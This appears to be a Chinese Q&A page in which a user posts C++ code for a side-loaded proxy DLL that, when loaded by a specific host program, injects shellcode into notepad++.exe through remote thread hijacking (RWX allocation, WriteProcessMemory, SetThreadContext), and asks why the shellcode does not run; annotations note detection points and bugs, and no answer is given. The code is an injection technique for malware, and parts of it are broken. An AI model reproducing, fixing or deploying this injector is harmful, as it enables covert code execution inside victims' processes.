问题描述
主要代码
// Worker thread that performs remote thread-execution hijacking
// (MITRE ATT&CK T1055.003): finds a process by image name, maps an
// executable buffer into it, copies `shellcode` (declared elsewhere,
// not shown) into that buffer and points one of the target's existing
// threads at it.
// Detection surface, as written: OpenProcess(PROCESS_ALL_ACCESS) ->
// VirtualAllocEx(PAGE_EXECUTE_READWRITE) -> WriteProcessMemory ->
// SuspendThread / SetThreadContext / ResumeThread on a thread the
// caller does not own, plus Toolhelp snapshots of all processes and
// threads.  Each of these is a well-known telemetry point for
// EDR / ETW-TI consumers, and RWX cross-process allocations are a
// high-confidence indicator on their own.
// Returns 0, or -1 / -2 if the allocation / write fails.
// Resource handling: the two early returns leak `snapshot`, and
// `targetProcessHandle`, `snapshotThread` and `threadHijacked` are never
// closed on any path.  lpParameter is unused.
DWORD WINAPI ThreadFunctionTargetProcessHandle(LPVOID lpParameter)
{
LPVOID remoteBuffer;
HANDLE targetProcessHandle=NULL;
BOOL didWeCopy = FALSE;
PROCESSENTRY32 entry;
THREADENTRY32 threadEntry;
entry.dwSize = sizeof(PROCESSENTRY32);
HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);
HANDLE threadHijacked = NULL;
DWORD idProcess = 0; // PID of the matched process (not a thread id); used to select a thread below
CONTEXT context;
context.ContextFlags = CONTEXT_FULL;
// The entry returned by Process32First is only used as the loop guard;
// the comparison starts with the second entry of the snapshot.
if (Process32First(snapshot,&entry) == TRUE)
{
while (Process32Next(snapshot,&entry) == TRUE)
{
//stricmp wcscmp
// Case-insensitive match on the image file name only (no path, no
// signature or PID check), so any process with this name qualifies.
if (stricmp(entry.szExeFile,"notepad++.exe") == 0)
{
MessageBox(0,std::to_string(entry.th32ProcessID).c_str(),"okk Attached",MB_ICONINFORMATION);
targetProcessHandle = OpenProcess(PROCESS_ALL_ACCESS,FALSE,entry.th32ProcessID);
idProcess = entry.th32ProcessID;
MessageBox(0,"From Process32First\n","Process32First Attached",MB_ICONINFORMATION);
break;
}
}
}
if (targetProcessHandle) {
// Cross-process RWX allocation: a classic injection indicator.
remoteBuffer = VirtualAllocEx(targetProcessHandle,NULL,SHELLCODELEN,(MEM_RESERVE | MEM_COMMIT),PAGE_EXECUTE_READWRITE);
if (remoteBuffer == NULL)
return -1; // leaks `snapshot` and `targetProcessHandle`
// Copy the shellcode into the memory we just created
didWeCopy = WriteProcessMemory(targetProcessHandle,remoteBuffer,shellcode,NULL);
if (!didWeCopy)
return -2; // leaks `snapshot` and `targetProcessHandle`
// Second snapshot, this time of every thread on the system; it is
// never closed.  Thread32First's result is ignored.
HANDLE snapshotThread = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD,0);
Thread32First(snapshotThread,&threadEntry);
while (Thread32Next(snapshotThread,&threadEntry))
{
// First thread owned by the target PID wins; no check that it is
// the kind of thread whose context makes sense to redirect.
if (threadEntry.th32OwnerProcessID == idProcess)
{
threadHijacked = OpenThread(THREAD_ALL_ACCESS,threadEntry.th32ThreadID);
break;
}
}
// NOTE(review): threadHijacked may still be NULL here (no thread matched
// or OpenThread failed); none of the calls below check it or their
// return values.
SuspendThread(threadHijacked);
GetThreadContext(threadHijacked,&context);
// RIP --- x64 architecture
// EIP --- x86 architecture
// This function assigns Eip, so it is written for an x86 (32-bit) build.
//FixShellCode(context.Eip,(DWORD)MessageBox);
context.Eip = (DWORD_PTR)remoteBuffer;
SetThreadContext(threadHijacked,&context);
ResumeThread(threadHijacked);
}
CloseHandle(snapshot);
MessageBox(0,"From CloseHandle(snapshot);\n","CloseHandle(snapshot); Attached",MB_ICONINFORMATION);
return 0;
}
DllMain
// DLL entry point.  On DLL_PROCESS_ATTACH it calls Load() and Init()
// (defined elsewhere, not shown) and, only when the hosting executable's
// base name equals szAppName, starts ThreadProc (not shown) and
// ThreadFunctionTargetProcessHandle.  On DLL_PROCESS_DETACH it calls
// Free().  Always returns TRUE.
// Review notes: CreateThread and MessageBox are called while the loader
// lock is held (inside DllMain), which the DllMain guidance warns
// against; the host-name gate together with the Load/Init/Free trio
// reads like a proxy / side-loaded DLL that only activates under one
// specific host -- confirm against the rest of the module.  The DLL
// also spawns an injection thread from a process-attach callback, i.e.
// as soon as it is loaded, with no further trigger.
// hModule is this DLL's module handle; pvReserved is unused.
BOOL APIENTRY DllMain(HMODULE hModule,DWORD dwReason,PVOID pvReserved)
{
if (dwReason == DLL_PROCESS_ATTACH)
{
DisableThreadLibraryCalls(hModule);
if (Load() && Init())
{
TCHAR szAppName[MAX_PATH] = TEXT("QMProxyAcceler.exe");// change this to the host process name
TCHAR szCurName[MAX_PATH];
// Base name of the executable that loaded this DLL (path stripped).
GetModuleFileName(NULL,szCurName,MAX_PATH);
PathStripPath(szCurName);
/*ThreadFunctionZZZ();*/
/*HANDLE threadHandle = CreateThread(NULL,ThreadFunctionXXX,NULL);
CloseHandle(threadHandle);*/
// whether to check the host process name
if (StrCmpI(szCurName,szAppName) == 0)
{
MessageBox(0,"szAppName okk\n","szAppName same",MB_ICONINFORMATION);
// start the patch thread or other work
HANDLE hThread = CreateThread(NULL,ThreadProc,NULL);
if (hThread)
{
CloseHandle(hThread);
}
// Unlike hThread above, this handle is closed without a NULL check.
HANDLE threadHandle = CreateThread(NULL,ThreadFunctionTargetProcessHandle,NULL);
CloseHandle(threadHandle);
//EnableDebugPriv();
}
}
}
else if (dwReason == DLL_PROCESS_DETACH)
{
Free();
}
return TRUE;
}
运行宿主程序后，弹出测试消息框，宿主程序正常运行，但是 shellcode 没有运行。
我检查了它是否已写入 notepad++ 的内存中:
代码都是在网上找到的。不知道问题出在哪里。
解决方法
暂无找到可以解决该程序问题的有效方法,小编努力寻找整理中!